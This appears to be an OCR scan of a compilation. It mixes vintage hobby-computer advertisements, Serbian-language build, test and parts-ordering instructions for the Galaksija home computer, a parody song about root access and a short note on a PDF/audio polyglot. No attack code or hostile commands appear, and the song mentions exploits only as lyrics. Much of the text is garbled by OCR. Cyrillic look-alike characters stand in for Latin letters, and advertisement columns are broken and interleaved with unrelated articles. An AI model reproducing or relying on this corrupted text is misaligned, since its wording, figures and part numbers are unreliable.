P.S. The Copydat does a lot more than make high-quality P.C. boards. It makes superior blueline, 
blackline, sepia, and other diazo process copies, and you can make pressure-sensitive labels with it 
and even instrument front panels from pre-sensitized metal plates ! ! 





CELDAT Design Assoc. 
P.O. Box 752 
Amherst, N.H. 03031 


from $149.95 (B size prints) 
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6. Na unutrašnju površinu poklopca 


ćemo zalemiti nekoliko 


stranica visine oko 10 mm, koje mogu da se podese da tesno 


ulaze u stranice kutije. Zato posebno učvršćenje poklopca za 


kutiju nije ni potrebno. 


SWTP 6800 OWNERS-WE HAVE А CASSETTE 


The CIS-30* allows you to record and playback 


ordinary cassette recorder at 30, 60 or 120 Bytes/Sec.! No Hassle! 


Your terminal connects to the CIS-30* which plugs 


Control (MP-C) or Serial (MP-S) Interface of your SWTP 6800 
Computer. The CIS-30+ uses the self clocking ‘Kansas City'/Biphase 


1/0 FOR YOU! 


data using an 


into either the 


Standard. The CIS-30* is the FASTEST, MOST RELIABLE CAS- 
SETTE I/O you can buy for your SWTP 6800 Computer. 





PerCom has a Cassette I/O for your computer! 


Call or Write for complete specification 


Р.О. Box 40598 + Garland, Texas 


5 


PerCom Data Со. 


75042 • (214) 276-1968 


PerCom — ‘peripherals for personal computing’ 





RATE 





TERMINAL 


Kit — $69.95* 
Assembled — $89.95* 
{manual included) 

* plus 5% f/shipping 


[ес ск 
PANKAMERICARD 
[гч] 


TEXAS RESIDENTS ADD 6% SALES TAX 





SEM LL ду 4 





7. Da bi poklopac bio otporniji na savijanje, zalemićemo 
jednu traku od vitroplasta i kroz sredinu. Ostalo nam je još 
samo dno kutije — možemo ga napraviti od bilo kog mate- 
rijala koji ne provodi struju. Mi ćemo dati prednost ploči 
od pleksiglasa, debljine oko 4 mm, koju ćemo pričvrstiti za 
glavnu ploču sa četiri zavrtnja M3 sa kontra-navrtkama ili 


distancerima za spajanje 


dve površine na rastojanju. 
E: % Krk 





e 





8. Ako želite da obojite kutiju i ispišete sve potrebne oznake 


—itu vam možemo pomoći dobrim savetom. Postoji, naime, 
postupak koji ima sve dobre osobine sito-štampe, daje estet- 
ski dobre rezultate, ima veliku mehaničku otpornost, a može 
se lako izvesti u amaterskim uslovima. Treba da pripremimo 
dva auto-lak spreja (najbolje da jedan bude beli a drugi tam- 
niji, recimo medio-plavi, broj 469), bočicu benzina za čišćenje 


i lithoset-slova I, eventualno, linije. 





9. Neophodno je da finim brusnim papirom obrusimo celu 
površinu koju ćemo obojiti. Nigde ne sme da bude sjajna, jer 
bi sa takvih mesta boja brzo otpala. Dobro ćemo je očistiti i 


odmastiti benzinom. 





mu 
10. Ravnomerno ćemo naprskati površinu svetlijom bojom 


(najbolje belom). Biće korisno ako proučimo uputsvo sa 


bočice spreja. Ovaj sloj treba da se suši najmanje tri časa, 


ali ne na hladnom ili vlažnom vazduhu. 


DO YOU SEE EYE TO EYE WITH YOUR APPLE? 


The DS-65 Digisector® opens up a whole new world for your Apple II. Your computer can now be a part of the action, taking pictures to amuse your \ 
friends, watching your house while you're away, taking computer portraits . . . the applications abound! The 05-65 is a random access video digitizer. 
It converts a TV camera's output into digital information that your computer can process. The DS-65 features: 
* High resolution: 256 X 256 picture element scan 
* Precision: 64 levels of grey scale 
* Versatility: Accepts either interlaced (NTSC) or industrial video input 
* Economy: A professional too! priced for the hobbyist 


The DS-65 is an intelligent peripheral card with on-board software in 2708 EPROM. 
Check these software features: 
* Full screen scans directly to Apple Hi-Res screen 
* Easy random access digitizing by Basic programs 
* Line-scan digitizing for reading charts or tracking objects 
* Utility functions for clearing and copying the Hi-Res screen 
Let your Apple see the world! 
DS-65 Price: $349.95 
Advanced Video FSII Camera Price $299.00 
SPECIAL COMBINATION PRICE: $599.00 


"MICRO 





APPLE SELF-PORTRAIT 


КОР, Р.О. BOX 1110 DEL MAR, CA 82014 NJ 
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11. Lithoset-slovima ćemo preko tek osušene površine ispisati 13. Posle oko jednog časa sušenja (ne mnogo duZe!), pažljivo 


sve potrebne tekstove. Ako izvučemo i linije po obodu kutije i ćemo noktom izgrebati slova i linije. Možda će posle ove faze 


pored otvora za tastaturu, dobićemo lepši izgled. Cistim i su- rada poklopac izgledati pomalo neprecizno i neuredno. Ne 


vim prstom ćemo pritisnuti svako slovo, da bismo bili sigurni obraćajmo, zasad, pažnju na to. 


da je dobro zalepljeno. 





12. Pažljivo ćemo sve to preprskati tamnijom bojom. Ovaj 


sloj treba da bude što ravnomerniji i tanji, tek toliko da se 14. Kad na čistu krpicu ili papirnu maramicu stavimo malo 


ne providi bela boja. benzina za čišćenje i protrljamo površinu, bićemo iznenađeni 


veoma lepim izgledom slova i linija. 


$95 MORSE TRANSCEIVER 


SEND: COPY: 

€ 1 to 150 WPM (set from БЫ (ae, uo eu € 1 to 150 WPM with 
terminal) к [7] g H w |} Auto-Sync. 

® 32 character FIFO buffer теген: ME вдн 


ith editi ө Continuously computes 
with editing & and displays Copy WPM 
• Auto Space on word boundries Nw Se pote A 
р Na e 80 НА Bandpass filter 


€ Grid/Cathode key output J иш 5 € Re-keyed Sidetone Озе. 
• LED Readout for WPM and > U? н with on-board speaker 


Bier space remaining Д cru cupis "Everything should be as simple as possible, 


copy any ‘fist style’ 
SERIAL INTERFACE: У 22? 
кейт nib M MRS-100 CONFIGURATIONS: See your local dealer or but no simpler — Einstein 


Y contact XITEX® direct. 
or Baudot (45, 50, 57, 74) compatible ө $95 Partial Kit (includes Microcomputer components 
e Simplex Hi У Loop ог T’ L and circuit boards; less box and analog components) MC/Visa aceepted 


electrical interface € $225 Complete Kit (includes box, power supply, 


€ Interfaces directly with the XITEX® and all other components) D 
SC i 


1-100 Video Terminal Board; Rian коза e oni ak chosen! | / R. Doss 5 Journat (Software and systems for small computers) 





Teletypes® Models 15, 28, 33, ete; 136: 
or the equivalent Overseas Orders and dealer inquires welcome Dallas, 


Р.О. Box E, Dept. H8, Menlo Park, СА 94025 * $15 for 10 issues * Send us your name, address and zip. We'll bill you. 
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10.4 


Bez ovog se пе može — 15- 
pravljač i stabilizator za 
janje 


napa- 


D+11V 


O +1=2\/ 
stab. 


D+5V 
stab. 





D masa 


Električna shema ispravljača 





trafo 12 М 5 M 11 
EPx9V v wv V 


HH 


Montažna shema ispravljača 





Štampano kolo ispravljača 
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5 IFIKACIJA DELOVA 
ZA ISPRAVLJAC 


OTPORNIK 
Ri ІК 
KONDENZATORI 


5500-6800 ДЕ 
8.2 do 1 


min. 16 V 


188 uF min. 16 У 
102-208 nF min. 400 V 


1N5400 
1N5408 
11400! 
1 446001 
cener dioda 


TEGRISANO KOLO 
stabilizator 7885 


TRANSFORMATOR 
2 X 7V\ min 6 W 


BZ 12 


Odmah сето reci da se stabilisani napon 12 V 
koristi samo za napajanje RF modulatora, i da ga 
možete izostaviti ako ne ugradujete modulator ili 
imate takav koji se napaja naponom 5 V. Time biste 
uštedeli komponente D3, D4, D5, C4, C5 i R1. Kon- 
denzator C6 na primarnoj strani mreZnog transfor- 
matora sluZi za eliminisanje neZeljenih smetnji koje 
bi se mogle pojaviti iz mreže. Ispravljač je punota- 
lasni, i na elektrolitskom kondenzatoru CI se dobija 
oko 11 V ispravljenog i filtriranog napona. Inte- 
grisani stabilizator 7805 obezbeduje oko 1А struje 
pri naponu od 5 V. Dobro je upotrebiti i transfor- 
mator koji moZe da napaja strujom te jacine, bez 
obzira što računar troši svega oko 0,4 A. Ostatak 
struje neka služi za kasnije napajanje eventualnih 
proširenja. Kondenzatori C2 i C3 osiguravaju 7805 
protiv oscilovanja. Pošto stabilizator 7805 u toku 
rada oslobađa veliku količinu toplote, potrebno ga 
je montirati na hladnjak. Ako nemamo fabrički, 
možemo ga napraviti od tri komada aluminijumskog 
lima dimenzija 35x80, 35x110 i 35x140, od kojih 
se svaki na dva mesta oštro savije u obliku slova U. 
Otvor na metalnoj zastavici stabilizatora je za zavr- 
tanj M3, kojim se on dobro stegne za hladnjak. Pre- 


poručljivo je pre montaže dodirnu površinu stabili- 
zatora namazati sa malo silikonske paste, radi boljeg 
odvođenja toplote. Nikakvi liskunski izolatori nisu 
potrebni. Izaberite sami u kakvu kutiju ćete mon- 
tirati ovaj ispravljač i transformator. Poželjno je 
da ima otvore za hlađenje, i ako je metalna, obave- 
zno treba mrežni napon dovesti trožilnim kablom sa 
,šuko-utikačem“. Zuto-zeleni vod kabla se sa jedne 
strane spaja sa listićem za uzemljenje šuko-utikača, 
a sa druge za masu metalne kutije i minus-pol ispra- 
vljača. 


10.5 fan- 


Jednostavan zahvat 
tastični efekti 


Da bismo običan crno-beli televizor pretvorili 
u monitor, moramo da poštujemo jedno važno 
ograničenje: video ulaz može da se doda samo te- 
levizoru koji ima mrežni transformator. ТУ pri- 
jemnici sa ,vrućom šasijom“ su vrlo opasni za pre- 
pravke jer su galvanski spojeni sa računarom i tako 
ugrožavaju život onoga ko upravo radi sa njim. 
Kako da proverite da li vaš televizor ima ,yruću 
šasiju“? Ako nemate dovoljno iskustva i predznanja, 
odustanite od tog posla ili ga prepustite stručnjaku. 
Ako ste sigurni u svoje znanje, otvorite televizor i 
uključite ga u mrežu (to je ono što, prema uput- 
stvima proizvođača, ,nikada ne smete da radite“), 
nikako ne dodirujući njegove metalne delove. Izme- 
rite potencijal mase televizora u odnosu na zemlju. 
Isključite mrežni utikač, okrenite ga za 180 stepeni 
pa ponovite merenje. Ako ste u bilo kom slučaju 
očitali neki napon, zatvorite televizor i odustanite 
od dalje prepravke. Rešenje vašeg problema se zove 
RF modulator. Ako ni u jednom slučaju niste re- 
gistrovali napon, možete da nastavite sa proverom. 
Otpor između bilo kog pola mrežnog priključka tele- 
vizora i mase mora da bude beskonačno veliki (meri 
se, naravno, sa isključenim napajanjem). Ako je i 
ova provera dala pozitivan rezultat, imate ,zeleno 
svetlo“ za prepravku. Najpre nabavite shemu vašeg 
TV prijemnika, rad bez nje nema smisla. Pronađite 
ulaz u prvi stepen video-pojačavača. Tu je obeležen 
napon takozvanog ,belog nivoa“, a sink je 2 volta 
ispod toga. Iranzistorski TV prijemnici najčešće 
imaju „beli nivo“ na +3 V, а sink na +1 V. Osta- 
vljajući prednapon iz razdelnika priključen na bazu 
tranzistora, otkačite vod koji dovodi signal iz video- 
detektora i povežite ga prema našoj slici. Potrebno 
je da dodate jedan bipolarni elektronski kondenza- 
бог od oko 50 pF ili, pošto se bipolarni elektroliti 
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teško nabavljaju, dva elektrolita od po 100 uF koje 
vezujete kontra-redno (plus polovi jedan prema dru- 
gom, a minus polovi su za utičnicu 1 prekidač koji 
služi za izbor funkcije televizora, ne odričemo se, da- 
kle, ni TV prijemnika). Na zadnjoj ploči televizora 
izbušite otvor za montažu prekidača i utičnice za vi- 
deosignal. Za povezivanje je dobro koristiti što kraće 
vodove koji, po mogućstvu, treba da budu oklopljeni 
(,širmovani") ili bar da im parice budu spiralno uvi- 
jane, jedan kabl oko drugog. Ista preporuka se od- 
nosi i na kabl koji povezuje računar i novi monitor. 
Time је prepravka završena. Zatvorite televizor i 
spojite ga sa računarom. Kada ih uključite, biće 
verovatno potrebno određeno podešavanje horizon- 
talne 1 vertikalne sinhronizacije, kao i podešavanje 
televizora na najjači kontrast, pri kome se slova još 
ne ,razmazuju". 


100. 1004 iz video 


| 
| 
rw eem 
tv 


ulaz 75 
$2 





i prednapon 


| 
i 
| 
| 
} 
| 
U 


dodate komponenta | 


Razdelnik za televizor 


10.6 Ргуо uključivanje — Bez panike, 
sve će biti u redu 
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Montažna shema logičke sonde 
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Električna shema logičke sonde 










inpitni 
šiljak 


SPECIF 
ZA 


OTPORNICI 


OGI 


KONDENZATOR 
Ci 188 nF 


DIODE 
Li-L . LED svetlete diode (6 КОМ) 


INTEBRISANA КОГА 


74 LS 04 
74 LS 93 


Najpre uključite u mrežu samo ispravljač. Izme- 
rite napone: stabilisani napon od 5 V ne sme da 
odstupa više od +0,25 V. Za 12 V (napon koji je 
potreban za neke RF modulatore) odstupanja mogu 
da budu i +1 V. Pošto ste se uverili da su naponi 
u dozvoljenim granicama, spojite mase ispravljača i 
računara komadom žice, merni instrument podesite 
na najširi opseg merenja jačine struje, pa plus pip- 
kom instrumenta dodirnite +5 V izlaz ispravljača, 
a minus pipkom ulaz za +5 V na računaru. In- 
strument treba da рокаде struju izmedu 300 1 500 
mA. Ako je dobijena vrednost u ovim granicama, 
uklonite instrument sa +5 V i ponovite isto sa + 12 
V. Zavisno od tipa upotrebljenog RF modulatora 
(on se jedini napaja strujom koju merimo), otklon 
kazaljke treba da bude nekoliko miliampera. Da bi- 
smo ga registrovali, dakle, moramo da smanjimo op- 
seg instrumenta. Ako je sve u redu, sklonimo merni 


ӨӨ 


instrument i priključimo monitor preko video-ulaza 
(ili TV prijemnik preko antenskog), povežimo ispra- 
vljač sa računarom i uključimo ga. Ako koristimo 
RF signal i TV prijemnik, preći ćemo skalu televi- 
zora na sva tri opsega da bismo našli gde je prijem 
najbolji. Računar će napisati prvu reč u svom životu 
— ,READY“ (spreman). 


10.6.1 Važno je da proradi — ne mora iz 
prve 


Ako računar ne proradi ‚17 prve“, ne dopustite da 
vas obuzme panika: prolazne teškoće su sastavni deo 
amaterskog rada. Ako slika postoji ali je nestabilna, 
pokušajte sa podešavanjem vertikalne i horizontalne 
sinhronizacije TV prijemnika ili monitora (regula- 
tori se nalaze na zadnjoj strani aparata; kod ne- 
kih televizora moraju da se podešavaju odvrtkom). 
Ako se na ekranu ništa ne vidi, pojačajte osvetlje- 
nje ekrana. Možda se sada, umesto jedne, vidi devet 
malih slika (u tri reda po tri) koje su crno oivičene i 
bez teksta. Ovu pojavu nije teško otkloniti: kvarc, 
umesto na 6.144 MHz, osciluje na tri puta višoj fre- 
kvenciji. Dovoljno je da ugradite kondenzator C5 
čija kapacitivnost iznosi između 10 i 30 РЕ. Za пје- 
govo dodavanje, kao i za bilo koju drugu prepravku, 
treba isključiti računar iz mreže. Ako je računar 
potpuno nem, dodirnite oprezno prstom svaku kom- 
ponentu, posebno IC kola. Hladnjak stabilizatora 
bi već posle nekoliko minuta rada trebao da bude 
topao, a nešto malo i ispravljačke diode i mrežni 
transformator. Od čipova sme umereno da se za- 
greva mikroprocesor (ne toliko da ne možemo da 
držimo prst na njemu!) i EPROM-i. Ako je nešto 
pregrejano, bar znamo gde da tražimo kratak spoj. 


10.6.2 Skriveni kvarovi i ćudljive greške 


Moguće je, naravno, da je kvar tako dobro „за- 
kriven“ da se još uvek nije pokazao. U tom slučaju 
je sasvim moguće da na štampi postoji neki kra- 
tak spoj. Isključite ispravljač, uzmite AVO-metar 
i na opsegu od om x 1 strpljivo ispitajte sve bli- 
ske vodove. Usput proverite i da li je nožica nekog 
čipa ostala, možda, nezalemljena, a zatim okrenite 
štampanu ploču i ponovo proverite ispravnost raspo- 
reda komponenti. Postoji i mogućnost da računar 
radi, ali uz neke specifične nedostatke: kada, re- 
cimo, pritisnete neki taster, pojave se dva slova ume- 
sto jednog. U tom slučaju je sasvim sigurno nastu- 
pio kratak spoj na linijama od čipova 741-5251 i 
74LS156 (nalaze se jedan pored drugoga) do tasta- 





ture. Ako snimite situaciju i zaključite koji se ра- 
rovi slova pojavljuju zajedno, moći ćete, gledajući 
razmeštaj tastera u matrici (na shemi) da tačno 
utvrdite koje su linije kratko spojene. Moguće je 
da se redovi teksta na ekranu krive po horizon- 
tali, naročito u poslednjim redovima. То govori o 
neprilagođenosti signala za sinhronizaciju slike, pa 
će biti neophodno da eksperimentišete sa promenom 
otpornosti R9 i R10 (R9 ne sme da bude manja od 
40 oma, jer će u protivnom biti ugrožen čip 741538). 


10.6.3 Alatka za tvrdokorne greške 


Za posebno „tvrdokorne“ greške treba napraviti 
jednu pomoćnu alatku: zove se logička sonda i može 
biti korisna i u mnogim drugim prilikama. Za nju su 
potrebna dva čipa. 74LSO4 i 740590, šest led dioda, 
jedan kondenzator i nekoliko otpornika. Pomoću ove 
sonde možemo da utvrdimo da li je logički nivo na 
nekoj od linija visok (svetli prvi LED), nizak (drugi 
LED) ili postoje povorke impulsa (tada preostale 
četiri LED ne prikazuju statičnu situaciju nego tre- 
pere, najčešće tako brzo da imamo utisak da sva 
četiri svetle, statična situacija, bez povorke impulsa, 
ne može nikada da upali sve četiri LE diode). Naj- 
bolje je da masa i napajanje sonde budu dve raz- 
nobojne fleksibilne žice dužine oko 50 cm koje se 
završavaju ,krokodil-hvataljkama“. Njima ćemo, ne- 
gde sa uređaja koji ispitujemo (to ne mora da bude 
samo računar ,galaksija“), dovesti stabilisanih 5 V 
pazeći na polaritet — greška može da ošteti sondu. 
Zatim ćemo, dodirujući zašiljenim vrhom sonde ka- 
rakteristične tačke, očitavati logička stanja. Naj- 
pre ćemo se uveriti da li oscilator radi. Nozica 10 
čipa 741,582 mora da pokazuje naizmenični signal, 
što znači da su svi LED-ovi upaljeni. Dalje pra- 
timo lanac delitelja: nožica 2 kola 741593, nožica 
14 kola CD4040, nožica 2 kola CD4017. Svako od 
ovih mesta pokazuje isto stanje na sondi, izuzev po- 
slednjeg, kod koga je učestanost dovoljno niska da 
primetimo kako neki LED-ovi trepere. Ako negde 
postoji statično stanje, našli smo grešku. Pažljivo 
proverimo okolnu štampu: ako na njoj nema greške, 
moraćemo da zamenimo čip. Nožica 26 mikroproce- 
sora mora oko pola sekunde po uključivanju da po- 
kazuje nizak logički nivo, a zatim stalno visok. Ako 
nije tako, proverite tranzistor vezan za tu nožicu i 
elektrolitski kondenzator koji spaja R5 sa +5 V. 


10.6.4 Drugi možda znaju više 


Ako ni posle svih ovih operacija niste pronašli 
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grešku, moraćete da potražite pomoć nekog 
stručnjaka. Čini nam se da je taj put jednostav- 
niji nego da počnete da učite elektroniku. Postoji, 
najzad, i jedan problem koji se rešava čisto softver- 
ski: ukoliko je slika na vašem monitoru (televizoru) 
pomerena previše ulevo, svaki put kada uključite 
računar moraćete da otkucate BYTE 11176, 12 i 
pritisnete (RET) (u ekstremnijem slučaju upotre- 
bite naredbu BYTE 11176,13). Slično tome, ako je 
slika pomerena udesno, možete da otkucate BYTE 
11176,10 (ili čak BYTE 11176,9) i pritisnete (RET) 
svaki put kada uključite računar. 





Tekst: Voja Antonić Crteži: Mirjana Antonić 
Fotografije: Ivan Ivanov 


10.7 Nabavka delova za računar 
»Galaksija“ Komponente 1 
kako ih steći 


Samogradnja računara, čak i u sredinama u 
kojima se mikroprocesori kupuju ,na kilo“, nije 
baš sasvim jednostavna stvar. Neki ključni delovi 
računara, kao što je ROM, ne nalaze se u slobodnoj 
prodaji nigde u svetu, a do nekih, kao što je tasta- 
tura, ne dolazi se ni jeftino ni lako. Kod nas, gde je 
jednu takvu avanturu može izgledati potpuno bez- 
umno. Pokazuje se, međutim, da je moguće savla- 
dati i jednu takvu prepreku. Kako? 

Zahvaljujući razumevanju i ljubavi prema 
računarima nekolicine domaćih proizvođača, „Са- 
laksija“ je uspela da za čitaoce ovog izdanja obez- 
bedi barem one komponente bez kojih bi samograd- 
nja računara predstavljala zaista samoubilački čin 
— ROM, tastaturu i pločicu sa štampanim vezama 
— ito po cenama koje su znatno ispod tržišnih! 
(Štampano kolo će hobiste koštati 40 odsto jeftinije 
nego ,Elektroniku Inženjering“, mada oni plaćaju 
porez na promet, a privredna organizacija ne!). Po- 
red toga, uspeli smo da sklopimo i dosta povoljan 
aranžman za nabavku poluprovodničkih komponenti 
iz inostranstva. U ovom času su pod znakom pitanja 
samo kutija računara i demonstraciona kaseta. Kli- 
zajući kurs dinara podiže cene svemu, pa je podigao 
cenu i računaru „galaksija“. Definitivna cena zavisi 
od načina nabavke čipova iz inostranstva. U najne- 
povoljnijem slučaju, ako vam carinici ne progledaju 
kroz prste za nekoliko čipova od kojih se sastoji ,,ga- 
laksija“, ona ne bi trebalo da bude veća od 15.500 
dinara (komplet mehaničkih delova = 4600, komplet 
čipova = 6500 carina 3250, kutija i pasivne kompo- 





nente = 1200 dinara), ali ne može biti manja od 
11.000 dinara. 


10.7.1 Mehaničke komponente 


Mehaničke komponente računara „Galaksija“ — 
štampano kolo, konektorska pločica, maska za ta- 
stere i tasteri sa kapicama — obezbeđuju Institut 
za vakuumsku tehniku iz Ljubljane (tasteri) i firme 
MIPRO, i Elektronika iz Buja (sve ostalo). Tasteri 
koji се biti ugrađeni u računar „galaksija“ zadovo- 
ljavaju sve profesionalne standarde — isti takvi se 
ugrađuju i u terminale nekoliko domaćih kompjuter- 
skih sistema. Štampano kolo (razume se, od vitro- 
plasta!) ima, takođe, profesionalni izgled i kvalitet. 
Vodovi su zaštićeni najpre galvanskim putem a za- 
tim i tzv. stop-lakom (to je ona zelena boja kojoj 
profesionalne ploče najviše duguju za svoj šarm). 
Sa gornje strane je štampan raspored elemenata. 
Ovakav kvalitet znatno olakšava sklapanje računara: 
mogućnost da se neka komponenta pogrešno postavi 
Ш da se na vodovima nepažnjom napravi ,tinolski“ 
most svedena je na teorijski minimum. Cena kom- 
pleta iznosi 4300 dinara i određena je tako da se 
pokriju proizvodni i poštanski troškovi, kao i porez 
na promet, na koji odlazi gotovo trećina sume! (U 
cenu nije uračunata konektorska pločica — očekuje 
se da neće biti skuplja od 300 din). Ovako popu- 
larna cena predstavlja podršku firmi MIPRO i Elek- 
tronika iz Buja i njihovih vlasnika Zvonka Jurasa 
i Blaža Krakića akciji „Galaksije“ u širenju ideje o 
kućnim računarima. Uz ovako povoljnu cenu idu, na 
žalost, i izvesna ograničenja, koja ne bi trebalo da 
brinu one koji na vreme donesu odluku da sagrade 
računar „galaksija“. Cena važi samo do 31. januara 
za narudZbenice koje stignu preko redakcije ,,Galak- 
sije“. MIPRO, i Elektronika će i nakon tog roka 
primati narudžbine, ali će isporuku vršiti po eko- 
nomskim (znači i znatno višim) cenama. Delovi se, 
uz to (na žalost vlasnika račinara ZX Spectrum i ZX 
81) mogu naručiti samo u paketu. Stotini čitalaca 
komplet mehaničkih komponenti će biti isporučen sa 
specijalnim popustom za 3660! Kojoj stotini? Pr- 
voj koja pošalje narudžbenice — 5. januara i posle 
toga! Zašto baš petog? Zato što ovo specijalno iz- 
danje ne stiže na sve kioske u isto vreme. Želimo, 
jednostavno, da svi čitaoci budu u ravnopravnom 
položaju! isporuka počinje 15. januara. Narudžbinu 
treba izvršiti na adresu: „Galaksija“, 11000 Beograd, 
Bulevar vojvode Mišića 17. 
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10.7.2 Integrisana kola 


Potencijalne graditelje „galaksije“ ništa, valjda, 
ne brine toliko kao nabavka integrisanih kola. Ona 
se, na žalost, mogu kupiti samo u inostranstvu. Ra- 
zloga za brigu ima zaista dosta: kako uskladiti na- 
rudžbu sa strogim carinskim propisima, kako obja- 
sniti na nepoznatom jeziku što vam je, zapravo, po- 
trebno, kako izvršiti uplatu? Postupak je, u osnovi, 
jednostavan: treba pisati stranoj firmi i zamoliti 
za profakturu. Kada predračun stigne, sa njim se 
odlazi u banku da bi se izvršila uplata — tzv. devi- 
zna doznaka za inostranstvo. Svako, međutim, ko je 
njime prošao zna koliko je težak taj put. Drugog, na 
žalost, nema. Jedno nikada ne gubite iz vida: maksi- 
malna vrednost jedne pošiljke ne sme da prelazi 1500 
dinara, inače će biti vraćena i nikada neće stići do 
vas. Da bi bar malo pojednostavila proceduru, „Са- 
laksija“ je sklopila aranžman sa firmom ,,Microtech- 
nica“ iz Graca. Cena kompleta integrisanih kola, RF 
modulatora, kvarca i tri podnoža iznosi 1000 šilinga 
(oko 6500 dinara) za verziju od 4 k RAM-a (da čipa 
6116), odnosno 1116 šilinga za verziju od 6 К RAM- 
a (tri čipa 6116). U cenu su uračunati i poštanski 
troškovi. Isporuka će biti vršena potpuno u skladu 
sa našim carinskim propisima. Da bi se izvršila na- 
rudžbina, dovoljno je zatražiti (na srpskohrvatskom) 
predračun delova za računar ,,galaksija“. Plaćanje se 
može izvršiti i jednom od sledećih kreditnih kartica. 
American Expres, Diners, Eurocard i Visa. Svim 
kupcima kompleta čipova za računar „galaksija“ 
»Microtechnica“ će besplatno programirati EPROM- 
e. To značajno skraćuje proceduru i ubrzava put 
do računara „galaksija“. Narudžbinu treba izvršiti 
na adresu: ,MICROTECHNICA“, A-8042 GRAZ, 
ot. PETER HAUPTSTRASSE 10. AUSTRIJA. 
Objavljujemo, takode, i adrese dva dobra distribu- 
tera iz Engleske (AMBIT INTERNATIONAL, 200 
NORTH SERVICE ROAD, BRENTWOOD, ES- 
SEX, ENGLAND) i Nemaéke (BÜRKLIN, SHIL- 
LERSTRASSE 40,8000 MÜNCHEN). 


10.7.3 Programiranje EPROM-a 


Bez sistemskih programa koje treba upisati u 
EPROM-e 2732 (ROM) i 2716 (karakter-generator) 
računar „galaksija“ je potpuno bespomoćan. Čitaoci 
koji naruče komplet delova od ,Microtechnice“ 
dobiće isprogramirane EPROM-e — dakle potpuno 
spremne za ugradnju. Čitaoci koji su već nabavili 
EPROM-e ili nameravaju da ih nabave preko nekog 
drugog distributera, treba da ih pre ugradnje pošalju 


redakciji na programiranje. Usluga je potpuno bes- 
platna, a obaviće je beogradska firma MIPRO (nije 
greška — postaje dve firme MIPRO i obe učestvuju 
u našoj akciji!), u kojoj je započet razvoj računara 
„galaksija“. EPROM-e možete početi da šaljete od- 
mah — biće vam vraćeni u roku od petnaest dana. 
U pošiljku ubacite dovoljno poštanskih maraka za 
povratno pismo — isto onoliko koliko ste morali da 
zalepite na nju da biste nam je poslali. Raspi- 
tajte se, dakle, pre slanja o tarifi na svojoj pošti. 
Vrednosno pismo predstavlja najsigurniji način da 
ЕРВОМ-1 stignu bezbedno do redakcije i do vas па- 
zad. EPROM-e treba slati na adresu: „Galaksija“, 
11000 Beograd, Bulevar vojvode Mišića 17. 


10.7.4 Dali važe preliminarne narudžbenice? 


Preliminarna narudzbenica za tastaturu i 
štampano kolo koju smo objavili u časopisu „Са- 
laksija“ imala je za cilj da nam pomogne da tačno 
procenimo interesovanje za samogradnju računara 
„galaksija“ (i adekvatno se pripremimo za čitavu ak- 
ciju) ali na osnovu njih ne možemo da vršimo ispo- 
ruku. Molim vas, zato, da nam pošaljete priloženu 
narudžbenicu, bez obzira da li ste već poslali preli- 
minarnu narudžbenicu iz ,Galaksije“ ili ne. Isporuku 
ćemo vršiti samo na osnovu priložene narudžbenice. 
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Жуз ИЦ 


Моја Antonié (in the back) and his friend Jova Regasek assembling Galaksija 
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10.7.5 1.13 Hitna pomoć 


Neiskusni konstruktori ne treba da se plaše da 
će ostati sami ako negde zapnu u toku sklapanja 
računara „galaksija“. U saradnji sa radio-klubom 
„Avala“ iz Beograda organizovali smo službu hitne 
pomoći koja će dežurati svakoga dana od 17 do 20 
časova uz telefon 011/402.-687. Sa ovim klubom 
ćemo, takođe, organizovati i besplatne kurseve za 
sklapanje računara. Detaljnija obaveštenja ćete naći 
u februarskoj „Galaksiji“ — u svakom slučaju pre 
nego što vam pođe za rukom da kompletirate de- 
love. 





NARUDŽBENICA | 

Ovim neopozivo naručujem komplet delove za računar ,,galaksija“ , 
(54 tastera, kapice sa odgovarajućim oznakama, aluminijumska maska VA 
za tastere i Stampano kolo) po ceni od 4300 dinara. U cenu nije 
uračunat štampani konektor koji će takođe biti isporučen. Očekuje se д 
da ukupna suma песе preci 4600 dinara. 

Isplatu ću izvršiti poštaru prilikom preuzimanja pošiljke. д 
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Texas Instruments 


MOS EPROMs 


even more affordable. 


TMS 2708 now $21.50 
The industry standard. 


TMS 2716 now $36.90' 


Remember a few months ago when 
EPROMs were expensive and hard 
to get? Due to TI's leadership they 
ћауе become available microcom- 
puter building blocks. 

Prices have dropped dramatically; 
availability is excellent. Credit TI's 
high-yield, high-volume production. 

TI's highly cost effective EPROMs 
feature a rugged, high-integrity 
ceramic package with sturdy gold- 
plated pins to withstand the repeated 
handling and insertions associated 
with reprogramming. And a gold- 
alloy-sealed lid for superior 
hermeticity. 


'The 2708 times two. 





TI offers a choice of three produc- 
tion EPROMs — all from stock. 


TMS 27LOS now $26.15' 
The low power 8K. 


*100-piece prices 


e TMS 2708. The industry standard 
8K EPROM. Fully TTL compatible. 

• TMS 27L08. The industry first low 
power8K EPROM fully compatible 
with the 2708. But less than one- 
half the power dissipation and 10% 
power supply tolerance. 

• TMS 2716. A 2708 times two. Twice 
the memory (16K) in the same 
space. An economical plug-in up- 
grade for 2708s. And TI's 16K 2716 
uses less power than a single 2708. 
To order the affordable 

EPROMSs, call your near- > 

est authorized ТІ distrib- SU 

utor listed to the left. 


TEXAS INSTRUMENTS 


INCORPORATED 


(©1977 Texas Instruments Incorporated 
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zines that teach cs concepts via cute drawings! 
shop.bubblesort.io 
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11 Root Rights are а Grrl’s Best Friend 


by foz 


The trolls are glad to lie for views 
They delight in online duels. 
But I prefer a man page that describes extensive tools. 


A shell on the sys may be quite continental 

But root rights are a grrl’s best friend. 

sudo may be grand, but it won’t pay the rental 

On your hosting fee, or help you with the disassembly. 
RAM gets cold as exploits get sold 

And we all mine bitcoin in the end. 

But exploit or shell script, priv escalation keeps its shape! 
Root rights are a grrl's best friend! 


There may come a time when a hacker needs a lawyer, 
But root rights are a grrl’s best friend. 

There may come a time when a tech firm employer 
Offers you stock options 

But get root rights and your own machines. 

Perks will fly when stocks are high, 

But beware when they start to descend. 

Machines will go offline and no more command line! 
Root rights are a grrl's best friend! 


I’ve heard of servers where you get admin accounts, 
But root rights are a grrl’s best friend. 

And I think that machines that you admin yourself 
Are better bets. If nothing else, big data sets! 

Unix time rolls on, entropy is gone, 

And you can’t get that file to prepend. 

But big racks or botnets you get props for root logins! 





Root rights, root rights, I don’t mean jail breaks, 
Root rights аге a grrl's best, best friend! 
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12 What if you could listen to this PDF? 


by Philippe Teuwen 


To honor the tradition of polyglot releases, this PDF is also an audio file featuring a 24-bit studio 
recording of Íbz' Root Rights are а Grrl's Best Friend, which you can enjoy with MPlayer or VLC media 
player. 

